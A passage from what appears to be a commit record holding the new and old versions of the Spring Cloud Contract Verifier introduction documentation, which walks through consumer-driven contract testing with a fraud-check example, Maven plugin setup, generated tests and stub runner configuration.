property\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=contract_maven_plugin,indent=0]\n----\n\nIMPORTANT: This example uses \"convention based\" naming by setting the\n`packageWithBaseClasses` property. Doing so means that the two last packages combine to\nmake the name of the base test class. In our case, the contracts were placed under\n`src\/test\/resources\/contracts\/fraud`. Since you do not have two packages starting from\nthe `contracts` folder, pick only one, which should be `fraud`. Add the `Base` suffix and\ncapitalize `fraud`. That gives you the `FraudBase` test class name.\n\nAll the generated tests extend that class. Over there, you can set up your Spring Context\nor whatever is necessary. In this case, use http:\/\/rest-assured.io\/[Rest Assured MVC] to\nstart the server side `FraudDetectionController`.\n\n[source,java,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/test\/java\/com\/example\/fraud\/FraudBase.java[]\n----\n\nNow, if you run the `.\/mvnw clean install`, you get something like this:\n\n[source,bash,indent=0]\n----\nResults :\n\nTests in error:\n ContractVerifierTest.validate_shouldMarkClientAsFraud:32 \u00bb IllegalState Parsed...\n----\n\nThis error occurs because you have a new contract from which a test was generated and it\nfailed since you have not implemented the feature. 
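You can inspect the generated sources to see exactly what the contract expects; assuming the plugin defaults, they land under `target\/generated-test-sources\/contracts`, for example:\n\n[source,bash,indent=0]\n----\n$ find target\/generated-test-sources\/contracts -name \"*Test.java\"\n----\n\n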
The auto-generated test would look\nlike this:\n\n[source,java,indent=0]\n----\n@Test\npublic void validate_shouldMarkClientAsFraud() throws Exception {\n \/\/ given:\n MockMvcRequestSpecification request = given()\n .header(\"Content-Type\", \"application\/vnd.fraud.v1+json\")\n .body(\"{\\\"client.id\\\":\\\"1234567890\\\",\\\"loanAmount\\\":99999}\");\n\n \/\/ when:\n ResponseOptions response = given().spec(request)\n .put(\"\/fraudcheck\");\n\n \/\/ then:\n assertThat(response.statusCode()).isEqualTo(200);\n assertThat(response.header(\"Content-Type\")).matches(\"application\/vnd.fraud.v1.json.*\");\n \/\/ and:\n DocumentContext parsedJson = JsonPath.parse(response.getBody().asString());\n assertThatJson(parsedJson).field(\"['fraudCheckStatus']\").matches(\"[A-Z]{5}\");\n assertThatJson(parsedJson).field(\"['rejection.reason']\").isEqualTo(\"Amount too high\");\n}\n----\n\nIf you used the Groovy DSL, you can see that all the `producer()` parts of the contract that were present in the\n`value(consumer(...), producer(...))` blocks got injected into the test.\nIf you used YAML, the same applies to the `matchers` sections of the `response`.\n\nNote that, on the producer side, you are also doing TDD. The expectations are expressed\nin the form of a test. This test sends a request to our own application with the URL,\nheaders, and body defined in the contract. It also expects precisely defined values\nin the response. In other words, you have the `red` part of `red`, `green`, and\n`refactor`. It is time to convert the `red` into the `green`.\n\n*Write the missing implementation.*\n\nBecause you know the expected input and expected output, you can write the missing\nimplementation:\n\n[source,java,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/main\/java\/com\/example\/fraud\/FraudDetectionController.java[tags=server_api,indent=0]\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/main\/java\/com\/example\/fraud\/FraudDetectionController.java[tags=new_impl,indent=0]\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/main\/java\/com\/example\/fraud\/FraudDetectionController.java[tags=initial_impl,indent=0]\n}\n----\n\nWhen you execute `.\/mvnw clean install` again, the tests pass. Since the `Spring Cloud\nContract Verifier` plugin adds the tests to the `generated-test-sources`, you can\nactually run those tests from your IDE.\n\n*Deploy your app.*\n\nOnce you finish your work, you can deploy your change. First, merge the branch:\n\n[source,bash,indent=0]\n----\n$ git checkout master\n$ git merge --no-ff contract-change-pr\n$ git push origin master\n----\n\nYour CI might run something like `.\/mvnw clean deploy`, which would publish both the\napplication and the stub artifacts.\n\n==== Consumer Side (Loan Issuance) Final Step\n\nAs a developer of the Loan Issuance service (a consumer of the Fraud Detection server):\n\n*Merge branch to master.*\n\n[source,bash,indent=0]\n----\n$ git checkout master\n$ git merge --no-ff contract-change-pr\n----\n\n*Work online.*\n\nNow you can disable the offline work for Spring Cloud Contract Stub Runner and indicate\nwhere the repository with your stubs is located. At this point, the stubs of the server\nside are automatically downloaded from Nexus\/Artifactory. You can set the value of\n`stubsMode` to `REMOTE`. 
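In the annotation, that could look as follows (the repository URL is a placeholder):\n\n[source,java,indent=0]\n----\n@AutoConfigureStubRunner(ids = {\"com.example:http-server:+:stubs:8080\"},\n\t\tstubsMode = StubRunnerProperties.StubsMode.REMOTE,\n\t\trepositoryRoot = \"https:\/\/your.artifact.repository\/libs-snapshot\")\n----\n\n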
The following code shows an example of\nachieving the same thing by changing the properties.\n\n[source,yaml,indent=0]\n----\ninclude::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-contract\/{branch}\/samples\/standalone\/dsl\/http-client\/src\/test\/resources\/application-test-repo.yaml[]\n----\n\nThat's it!\n\n=== Dependencies\n\nThe best way to add dependencies is to use the proper `starter` dependency.\n\nFor `stub-runner`, use `spring-cloud-starter-stub-runner`. When you use a plugin, add\n`spring-cloud-starter-contract-verifier`.\n\n=== Additional Links\n\nHere are some resources related to Spring Cloud Contract Verifier and Stub Runner. Note\nthat some may be outdated, because the Spring Cloud Contract Verifier project is under\nconstant development.\n\n==== Spring Cloud Contract video\n\nYou can check out the video from the Warsaw JUG about Spring Cloud Contract:\n\nvideo::sAAklvxmPmk[youtube,start=538,width=640,height=480]\n\n==== Readings\n\n- http:\/\/www.slideshare.net\/MarcinGrzejszczak\/stick-to-the-rules-consumer-driven-contracts-201507-confitura[Slides from Marcin Grzejszczak's talk about Accurest]\n- http:\/\/toomuchcoding.com\/blog\/categories\/accurest\/[Accurest related articles from Marcin Grzejszczak's blog]\n- http:\/\/toomuchcoding.com\/blog\/categories\/spring-cloud-contract\/[Spring Cloud Contract related articles from Marcin Grzejszczak's blog]\n- http:\/\/groovy-lang.org\/json.html[Groovy docs regarding JSON]\n\n=== Samples\n\nYou can find some samples at\nhttps:\/\/github.com\/spring-cloud-samples\/spring-cloud-contract-samples[samples].\n","old_contents":"== Spring Cloud Contract Verifier Introduction\n\nTIP: The Accurest project was initially started by Marcin Grzejszczak and Jakub Kubrynski\n(http:\/\/codearte.io[codearte.io])\n\nSpring Cloud Contract Verifier enables Consumer Driven Contract (CDC) development of\nJVM-based applications. It moves TDD to the level of software architecture.\n\nSpring Cloud Contract Verifier ships with _Contract Definition Language_ (CDL). Contract\ndefinitions are used to produce the following resources:\n\n* JSON stub definitions to be used by WireMock when doing integration testing on the\nclient code (_client tests_). Test code must still be written by hand, and test data is\nproduced by Spring Cloud Contract Verifier.\n* Messaging routes, if you're using a messaging service. We integrate with Spring\nIntegration, Spring Cloud Stream, Spring AMQP, and Apache Camel. You can also set your\nown integrations.\n* Acceptance tests (in JUnit or Spock) are used to verify if server-side implementation\nof the API is compliant with the contract (__server tests__). 
A full test is generated by\nSpring Cloud Contract Verifier.\n\n=== Why a Contract Verifier?\n\nAssume that we have a system consisting of multiple microservices:\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-contract\/{branch}\/docs\/src\/main\/asciidoc\/images\/Deps.png[Microservices Architecture]\n\n==== Testing issues\n\nIf we wanted to test the application in top left corner to determine whether it can\ncommunicate with other services, we could do one of two things:\n\n- Deploy all microservices and perform end-to-end tests.\n- Mock other microservices in unit\/integration tests.\n\nBoth have their advantages but also a lot of disadvantages.\n\n*Deploy all microservices and perform end to end tests*\n\nAdvantages:\n\n- Simulates production.\n- Tests real communication between services.\n\nDisadvantages:\n\n- To test one microservice, we have to deploy 6 microservices, a couple of databases,\netc.\n- The environment where the tests run is locked for a single suite of tests (nobody else\nwould be able to run the tests in the meantime).\n- They take a long time to run.\n- The feedback comes very late in the process.\n- They are extremely hard to debug.\n\n*Mock other microservices in unit\/integration tests*\n\nAdvantages:\n\n- They provide very fast feedback.\n- They have no infrastructure requirements.\n\nDisadvantages:\n\n- The implementor of the service creates stubs that might have nothing to do with\nreality.\n- You can go to production with passing tests and failing production.\n\nTo solve the aforementioned issues, Spring Cloud Contract Verifier with Stub Runner was\ncreated. The main idea is to give you very fast feedback, without the need to set up the\nwhole world of microservices. If you work on stubs, then the only applications you need\nare those that your application directly uses.\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-contract\/{branch}\/docs\/src\/main\/asciidoc\/images\/Stubs2.png[Stubbed Services]\n\nSpring Cloud Contract Verifier gives you the certainty that the stubs that you use were\ncreated by the service that you're calling. Also, if you can use them, it means that they\nwere tested against the producer's side. In short, you can trust those stubs.\n\n=== Purposes\n\nThe main purposes of Spring Cloud Contract Verifier with Stub Runner are:\n\n- To ensure that WireMock\/Messaging stubs (used when developing the client) do exactly\nwhat the actual server-side implementation does.\n- To promote ATDD method and Microservices architectural style.\n- To provide a way to publish changes in contracts that are immediately visible on both\nsides.\n- To generate boilerplate test code to be used on the server side.\n\nIMPORTANT: Spring Cloud Contract Verifier's purpose is NOT to start writing business\nfeatures in the contracts. Assume that we have a business use case of fraud check. If a\nuser can be a fraud for 100 different reasons, we would assume that you would create 2\ncontracts, one for the positive case and one for the negative case. 
Contract tests are\nused to test contracts between applications and not to simulate full behavior.\n\n=== How It Works\n\nThis section explores how Spring Cloud Contract Verifier with Stub Runner works.\n\n==== A three second tour\n\n===== On the Producer Side\n\nIn order to start working with `Spring Cloud Contract`, add files with REST\/ messaging contracts expressed in either\nGroovy DSL or YAML to the contracts directory set by the\n`contractsDslDir` property, by default `$rootDir\/src\/test\/resources\/contracts`.\n\nThen, add Spring Cloud Contract Verifier dependency and plugin to your build file:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=verifier_test_dependencies,indent=0]\n----\n\n[source,xml,indent=0]\n----\n<plugin>\n\t<groupId>org.springframework.cloud<\/groupId>\n\t<artifactId>spring-cloud-contract-maven-plugin<\/artifactId>\n\t<version>${spring-cloud-contract.version}<\/version>\n\t<extensions>true<\/extensions>\n<\/plugin>\n----\n\nNow, running `.\/mvnw clean install` will cause tests that verify the application\ncompliance with the added contracts to be automatically generated, by default under `org.springframework.cloud.contract.verifier.tests.`.\n\nAs the implementation of the functionalities described by the contracts is not yet present,\n the tests will fail.\n\nTo make them pass, the correct implementation of either handling HTTP requests or messages\nwill have to be added. Also, a correct base test class for auto-generated tests needs to be added to the project.\nThis class will be extended by all the auto-generated tests and it should contain all the setup\nnecessary to run them (for example `RestAssuredMockMvc` controller setup or messaging test setup).\n\nOnce the implementation and the test base class are in place, the tests will pass, and both the application\n and the stub artifacts will be built and installed in the local Maven repository. The changes can now be merged\n and both the application and the stub artifacts may be published in an online repository.\n\n===== On the Consumer Side\n\n`Spring Cloud Contract Stub Runner` can be used in the integration tests to get a running WireMock instance\/\nmessaging route that simulates the actual service.\n\nAdd the dependency to `Spring Cloud Contract Stub Runner`:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/pom.xml[tags=stub_runner,indent=0]\n----\n\nGet the Producer-side stubs installed in your Maven repository by either:\n\n- checking out the Producer side repository, adding contracts and generating the stubs by running:\n\n[source,bash,indent=0]\n----\n$ cd local-http-server-repo\n$ .\/mvnw clean install -DskipTests\n----\nTIP: The tests are being skipped because the Producer-side contract implementation is not in place yet,\nso the automatically-generated contract tests would fail;\n\nor:\n\n- getting already existing producer service stubs from a remote repository; to do this, simply pass the\n stub artifact ids and artifact repository url as `Spring Cloud Contract Stub Runner` properties:\n\n[source,yaml,indent=0]\n----\ninclude::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-contract\/{branch}\/samples\/standalone\/dsl\/http-client\/src\/test\/resources\/application-test-repo.yaml[]\n----\n\nNow just annotate your test class with `@AutoConfigureStubRunner`. 
In the annotation, provide\nthe group-id and artifact-id for `Spring Cloud Contract Stub Runner` to run the collaborators' stubs for you.\n\nTIP: Use the `REMOTE` stubsMode when downloading stubs from an online repository and `LOCAL` for offline work.\n\n[source,java, indent=0]\n----\n@RunWith(SpringRunner.class)\n@SpringBootTest(webEnvironment=WebEnvironment.NONE)\n@AutoConfigureStubRunner(ids = {\"com.example:http-server-dsl:+:stubs:6565\"},\n\t\tstubsMode = StubRunnerProperties.StubsMode.LOCAL)\n@DirtiesContext\npublic class LoanApplicationServiceTests {\n----\n\nNow in your integration test, you will be able to receive stubbed versions of HTTP responses or messages that are\nexpected to be emitted by the collaborator service.\n\n==== A three minute tour\n\n===== On the Producer Side\n\nIn order to start working with `Spring Cloud Contract`, add files with REST\/ messaging contracts expressed in either\nGroovy DSL or YAML to the contracts directory set by the\n`contractsDslDir` property, by default `$rootDir\/src\/test\/resources\/contracts`.\n\nFor the HTTP stubs, a contract defines what kind of response should be returned for a given request (taking into account the HTTP\nmethods, urls, headers, status codes, etc.). A sample HTTP stub contract in Groovy DSL would look like this:\n\n[source,groovy,indent=0]\n----\npackage contracts\n\norg.springframework.cloud.contract.spec.Contract.make {\n\trequest {\n\t\tmethod 'PUT'\n\t\turl '\/fraudcheck'\n\t\tbody([\n\t\t\t \"client.id\": $(regex('[0-9]{10}')),\n\t\t\t loanAmount: 99999\n\t\t])\n\t\theaders {\n\t\t\tcontentType('application\/json')\n\t\t}\n\t}\n\tresponse {\n\t\tstatus 200\n\t\tbody([\n\t\t\t fraudCheckStatus: \"FRAUD\",\n\t\t\t \"rejection.reason\": \"Amount too high\"\n\t\t])\n\t\theaders {\n\t\t\tcontentType('application\/json')\n\t\t}\n\t}\n}\n----\n\nWhile the same contract expressed in YAML would look the following way:\n\n[source,yaml,indent=0]\n----\nrequest:\n method: PUT\n url: \/fraudcheck\n body:\n \"client.id\": 1234567890\n loanAmount: 99999\n headers:\n Content-Type: application\/json\n matchers:\n body:\n - path: $.['client.id']\n type: by_regex\n value: \"[0-9]{10}\"\nresponse:\n status: 200\n body:\n fraudCheckStatus: \"FRAUD\"\n \"rejection.reason\": \"Amount too high\"\n headers:\n Content-Type: application\/json;charset=UTF-8\n----\n\nIn the case of messaging, the input and the output messages can be defined (taking into account from and\nwhere to it was sent, the message body and header), as well as the methods that should be called after the message\n is received or the methods that, when called, should trigger a message.\nAn example of a Camel messaging contract expressed in Groovy DSL whould look like this:\n\n[source,groovy]\n----\ninclude::{verifier_core_path}\/src\/test\/groovy\/org\/springframework\/cloud\/contract\/verifier\/builder\/MessagingMethodBodyBuilderSpec.groovy[tags=trigger_no_output_dsl]\n----\n\nWhile, the same contract expressed in YAML would look as in the code below:\n\n[source,yml,indent=0]\n----\ninclude::{verifier_core_path}\/src\/test\/resources\/yml\/contract_message_scenario3.yml[indent=0]\n----\n\nThen, add Spring Cloud Contract Verifier dependency and plugin to your build 
file:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=verifier_test_dependencies,indent=0]\n----\n\n[source,xml,indent=0]\n----\n<plugin>\n\t<groupId>org.springframework.cloud<\/groupId>\n\t<artifactId>spring-cloud-contract-maven-plugin<\/artifactId>\n\t<version>${spring-cloud-contract.version}<\/version>\n\t<extensions>true<\/extensions>\n<\/plugin>\n----\n\nNow, running `.\/mvnw clean install` will cause tests that verify the application\ncompliance with the added contracts to be automatically generated, by default under `org.springframework.cloud.contract.verifier.tests.`.\n\nA sample auto-generated test for an HTTP contract would look the following way:\n\n[source,java,indent=0]\n----\n@Test\npublic void validate_shouldMarkClientAsFraud() throws Exception {\n \/\/ given:\n MockMvcRequestSpecification request = given()\n .header(\"Content-Type\", \"application\/vnd.fraud.v1+json\")\n .body(\"{\\\"client.id\\\":\\\"1234567890\\\",\\\"loanAmount\\\":99999}\");\n\n \/\/ when:\n ResponseOptions response = given().spec(request)\n .put(\"\/fraudcheck\");\n\n \/\/ then:\n assertThat(response.statusCode()).isEqualTo(200);\n assertThat(response.header(\"Content-Type\")).matches(\"application\/vnd.fraud.v1.json.*\");\n \/\/ and:\n DocumentContext parsedJson = JsonPath.parse(response.getBody().asString());\n assertThatJson(parsedJson).field(\"['fraudCheckStatus']\").matches(\"[A-Z]{5}\");\n assertThatJson(parsedJson).field(\"['rejection.reason']\").isEqualTo(\"Amount too high\");\n}\n----\n\nThe sample above uses Spring's `MockMvc` to run the tests. This is the default test mode for HTTP\ncontracts, however also JAX-RX client and explicit HTTP invocations can be used as well (just change\nthe `testMode` property of the plugin to `JAX-RS` or `EXPLICIT`.\n\nApart from the default JUnit, you can also use Spock tests, instead, by setting the plugin `testFramework`\nproperty to `Spock`.\n\nTIP: You can now also generate WireMock scenarios based on the contracts, by including an order number followed by\n an underscore at the beginning of the contract file names.\n\nA sample auto-generated test in Spock for a messaging stub contract would look similar to this:\n\n [source,groovy,indent=0]\n----\ngiven:\n\t ContractVerifierMessage inputMessage = contractVerifierMessaging.create(\n\t\t\\'\\'\\'{\"bookName\":\"foo\"}\\'\\'\\',\n\t\t['sample': 'header']\n\t)\n\nwhen:\n\t contractVerifierMessaging.send(inputMessage, 'jms:delete')\n\nthen:\n\t noExceptionThrown()\n\t bookWasDeleted()\n----\n\nAs the implementation of the functionalities described by the contracts is not yet present,\n the tests will fail.\n\nTo make them pass, the correct implementation of handling either HTTP requests or messages\nwill have to be added. Also, a correct base test class for auto-generated tests needs to be added to the project.\nThis class will be extended by all the auto-generated tests and it should contain all the setup\nnecessary to run them (for example `RestAssuredMockMvc` controller setup or messaging test setup).\n\nOnce the implementation and the test base class are in place, the tests will pass, and both the application\n and the stub artifacts will be built and installed in the local Maven repository. 
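A plain rebuild is all that is needed for this step (these samples use the Maven wrapper):\n\n[source,bash,indent=0]\n----\n$ .\/mvnw clean install\n----\n\n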
Information about\n installing the stubs jar to the local repository will appear in the logs:\n\n[source,bash,indent=0]\n----\n [INFO] --- spring-cloud-contract-maven-plugin:1.0.0.BUILD-SNAPSHOT:generateStubs (default-generateStubs) @ http-server ---\n [INFO] Building jar: \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT-stubs.jar\n [INFO]\n [INFO] --- maven-jar-plugin:2.6:jar (default-jar) @ http-server ---\n [INFO] Building jar: \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT.jar\n [INFO]\n [INFO] --- spring-boot-maven-plugin:1.5.5.BUILD-SNAPSHOT:repackage (default) @ http-server ---\n [INFO]\n [INFO] --- maven-install-plugin:2.5.2:install (default-install) @ http-server ---\n [INFO] Installing \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT.jar to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT.jar\n [INFO] Installing \/some\/path\/http-server\/pom.xml to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT.pom\n [INFO] Installing \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT-stubs.jar to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar\n----\n\nThe changes can now be merged and both the application and the stub artifacts may be published in an online repository.\n\n*Docker Project*\n\nIn order to enable working with contracts while creating applications in non-JVM technologies,\nthe `springcloud\/spring-cloud-contract` Docker image has been created. It contains a project that will\nautomatically generate tests for HTTP contracts and execute them in `EXPLICIT` test mode, then, if\nthe tests pass, generate Wiremock stubs and -optionally- publish them to an artifact manager. In order to use the\nimage, it's sufficient to mount the contracts into the `\/contracts` directory and set a few environment variables.\n\n===== On the Consumer Side\n\n`Spring Cloud Contract Stub Runner` can be used in the integration tests to get a running WireMock instance\/\nmessaging route that simulates the actual service.\n\nAdd the dependency to `Spring Cloud Contract Stub Runner`:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/pom.xml[tags=stub_runner,indent=0]\n----\n\nGet the Producer-side stubs installed in your Maven repository by either:\n\n- checking out the Producer side repository, adding contracts and generating the stubs by running:\n\n[source,bash,indent=0]\n----\n$ cd local-http-server-repo\n$ .\/mvnw clean install -DskipTests\n----\nTIP: The tests are being skipped because the Producer-side contract implementation is not in place yet,\nso the automatically-generated contract tests would fail;\n\nor:\n\n- getting already existing producer service stubs from a remote repository; to do this, simply pass the\n stub artifact ids and artifact repository url as `Spring Cloud Contract Stub Runner` properties:\n\n[source,yaml,indent=0]\n----\ninclude::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-contract\/{branch}\/samples\/standalone\/dsl\/http-client\/src\/test\/resources\/application-test-repo.yaml[]\n----\n\nNow just annotate your test class with `@AutoConfigureStubRunner`. 
In the annotation, provide\nthe group-id and artifact-id for `Spring Cloud Contract Stub Runner` to run the collaborators' stubs for you.\n\nTIP: Use the `REMOTE` stubsMode when downloading stubs from an online repository and `LOCAL` for offline work.\n\n[source,java, indent=0]\n----\n@RunWith(SpringRunner.class)\n@SpringBootTest(webEnvironment=WebEnvironment.NONE)\n@AutoConfigureStubRunner(ids = {\"com.example:http-server-dsl:+:stubs:6565\"},\n\t\tstubsMode = StubRunnerProperties.StubsMode.LOCAL)\n@DirtiesContext\npublic class LoanApplicationServiceTests {\n----\n\nNow in your integration test, you will be able to receive stubbed versions of HTTP responses or messages that are\nexpected to be emitted by the collaborator service. You will see entries similar to theses in the build logs:\n\n[source,bash,indent=0]\n----\n2016-07-19 14:22:25.403 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Desired version is + - will try to resolve the latest version\n2016-07-19 14:22:25.438 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Resolved version is 0.0.1-SNAPSHOT\n2016-07-19 14:22:25.439 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Resolving artifact com.example:http-server:jar:stubs:0.0.1-SNAPSHOT using remote repositories []\n2016-07-19 14:22:25.451 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Resolved artifact com.example:http-server:jar:stubs:0.0.1-SNAPSHOT to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar\n2016-07-19 14:22:25.465 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Unpacking stub from JAR [URI: file:\/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar]\n2016-07-19 14:22:25.475 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Unpacked file to [\/var\/folders\/0p\/xwq47sq106x1_g3dtv6qfm940000gq\/T\/contracts100276532569594265]\n2016-07-19 14:22:27.737 INFO 41050 --- [ main] o.s.c.c.stubrunner.StubRunnerExecutor : All stubs are now running RunningStubs [namesAndPorts={com.example:http-server:0.0.1-SNAPSHOT:stubs=8080}]\n----\n\n\n==== Defining the contract\n\nAs consumers of services, we need to define what exactly we want to achieve. We need to\nformulate our expectations. That is why we write contracts.\n\nAssume that you want to send a request containing the ID of a client company and the\namount it wants to borrow from us. 
You also want to send it to the \/fraudcheck url via\nthe PUT method.\n\n.Groovy DSL\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/test\/resources\/contracts\/fraud\/shouldMarkClientAsFraud.groovy[]\n----\n\n.YAML\n[source,yml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/yml\/http-server\/src\/test\/resources\/contracts\/fraud\/shouldMarkClientAsFraud.yml[]\n----\n\n==== Client Side\n\nSpring Cloud Contract generates stubs, which you can use during client-side testing.\nYou get a running WireMock instance\/Messaging route that simulates the service.\nYou would like to feed that instance with a proper stub definition.\n\nAt some point in time, you need to send a request to the Fraud Detection service.\n\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/src\/main\/java\/com\/example\/loan\/LoanApplicationService.java[tags=client_call_server,indent=0]\n----\n\nAnnotate your test class with `@AutoConfigureStubRunner`. In the annotation provide the group id and artifact id for the Stub Runner to download stubs of your collaborators.\n\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/src\/test\/java\/com\/example\/loan\/LoanApplicationServiceTests.java[tags=autoconfigure_stubrunner,indent=0]\n----\n\nAfter that, during the tests, Spring Cloud Contract automatically finds the stubs\n(simulating the real service) in the Maven repository and exposes them on a configured\n(or random) port.\n\n==== Server Side\n\nSince you are developing your stub, you need to be sure that it actually resembles your\nconcrete implementation. You cannot have a situation where your stub acts in one way and\nyour application behaves in a different way, especially in production.\n\nTo ensure that your application behaves the way you define in your stub, tests are\ngenerated from the stub you provide.\n\nThe autogenerated test looks, more or less, like this:\n\n[source,java,indent=0]\n----\n@Test\npublic void validate_shouldMarkClientAsFraud() throws Exception {\n \/\/ given:\n MockMvcRequestSpecification request = given()\n .header(\"Content-Type\", \"application\/vnd.fraud.v1+json\")\n .body(\"{\\\"client.id\\\":\\\"1234567890\\\",\\\"loanAmount\\\":99999}\");\n\n \/\/ when:\n ResponseOptions response = given().spec(request)\n .put(\"\/fraudcheck\");\n\n \/\/ then:\n assertThat(response.statusCode()).isEqualTo(200);\n assertThat(response.header(\"Content-Type\")).matches(\"application\/vnd.fraud.v1.json.*\");\n \/\/ and:\n DocumentContext parsedJson = JsonPath.parse(response.getBody().asString());\n assertThatJson(parsedJson).field(\"['fraudCheckStatus']\").matches(\"[A-Z]{5}\");\n assertThatJson(parsedJson).field(\"['rejection.reason']\").isEqualTo(\"Amount too high\");\n}\n----\n\n=== Step-by-step Guide to Consumer Driven Contracts (CDC)\n\nConsider an example of Fraud Detection and the Loan Issuance process. The business\nscenario is such that we want to issue loans to people but do not want them to steal from\nus. The current implementation of our system grants loans to everybody.\n\nAssume that `Loan Issuance` is a client to the `Fraud Detection` server. 
In the current\nsprint, we must develop a new feature: if a client wants to borrow too much money, then\nwe mark the client as a fraud.\n\nTechnical remark - Fraud Detection has an `artifact-id` of `http-server`, while Loan\nIssuance has an artifact-id of `http-client`, and both have a `group-id` of `com.example`.\n\nSocial remark - both client and server development teams need to communicate directly and\ndiscuss changes while going through the process. CDC is all about communication.\n\nThe https:\/\/github.com\/spring-cloud\/spring-cloud-contract\/tree\/{branch}\/samples\/standalone\/dsl\/http-server[server\nside code is available here] and https:\/\/github.com\/spring-cloud\/spring-cloud-contract\/tree\/{branch}\/samples\/standalone\/dsl\/http-client[the\nclient code here].\n\nTIP: In this case, the producer owns the contracts. Physically, all the contract are\nin the producer's repository.\n\n==== Technical note\n\nIf using the *SNAPSHOT* \/ *Milestone* \/ *Release Candidate* versions please add the\nfollowing section to your build:\n\n[source,xml,indent=0,subs=\"verbatim,attributes\",role=\"primary\"]\n.Maven\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=repos,indent=0]\n----\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\",role=\"secondary\"]\n.Gradle\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/build.gradle[tags=deps_repos,indent=0]\n----\n\n==== Consumer side (Loan Issuance)\n\nAs a developer of the Loan Issuance service (a consumer of the Fraud Detection server), you might do the following steps:\n\n. Start doing TDD by writing a test for your feature.\n. Write the missing implementation.\n. Clone the Fraud Detection service repository locally.\n. Define the contract locally in the repo of Fraud Detection service.\n. Add the Spring Cloud Contract Verifier plugin.\n. Run the integration tests.\n. File a pull request.\n. Create an initial implementation.\n. Take over the pull request.\n. Write the missing implementation.\n. Deploy your app.\n. Work online.\n\n*Start doing TDD by writing a test for your feature.*\n\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/src\/test\/java\/com\/example\/loan\/LoanApplicationServiceTests.java[tags=client_tdd,indent=0]\n----\n\nAssume that you have written a test of your new feature. If a loan application for a big\namount is received, the system should reject that loan application with some description.\n\n*Write the missing implementation.*\n\nAt some point in time, you need to send a request to the Fraud Detection service. Assume\nthat you need to send the request containing the ID of the client and the amount the\nclient wants to borrow. You want to send it to the `\/fraudcheck` url via the `PUT` method.\n\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/src\/main\/java\/com\/example\/loan\/LoanApplicationService.java[tags=client_call_server,indent=0]\n----\n\nFor simplicity, the port of the Fraud Detection service is set to `8080`, and the\napplication runs on `8090`.\n\nIf you start the test at this point, it breaks, because no service currently runs on port\n`8080`.\n\n*Clone the Fraud Detection service repository locally.*\n\nYou can start by playing around with the server side contract. 
To do so, you must first\nclone it.\n\n[source,bash,indent=0]\n----\n$ git clone https:\/\/your-git-server.com\/server-side.git local-http-server-repo\n----\n\n*Define the contract locally in the repo of Fraud Detection service.*\n\nAs a consumer, you need to define what exactly you want to achieve. You need to formulate\nyour expectations. To do so, write the following contract:\n\nIMPORTANT: Place the contract under `src\/test\/resources\/contracts\/fraud` folder. The `fraud` folder\nis important because the producer's test base class name references that folder.\n\n.Groovy DSL\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/test\/resources\/contracts\/fraud\/shouldMarkClientAsFraud.groovy[]\n----\n\n.YAML\n[source,yml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/yml\/http-server\/src\/test\/resources\/contracts\/fraud\/shouldMarkClientAsFraud.yml[]\n----\n\nThe YML contract is quite straight-forward. However when you take a look at the Contract\nwritten using a statically typed Groovy DSL - you might wonder what the\n`value(client(...), server(...))` parts are. By using this notation, Spring Cloud\nContract lets you define parts of a JSON block, a URL, etc., which are dynamic. In case\nof an identifier or a timestamp, you need not hardcode a value. You want to allow 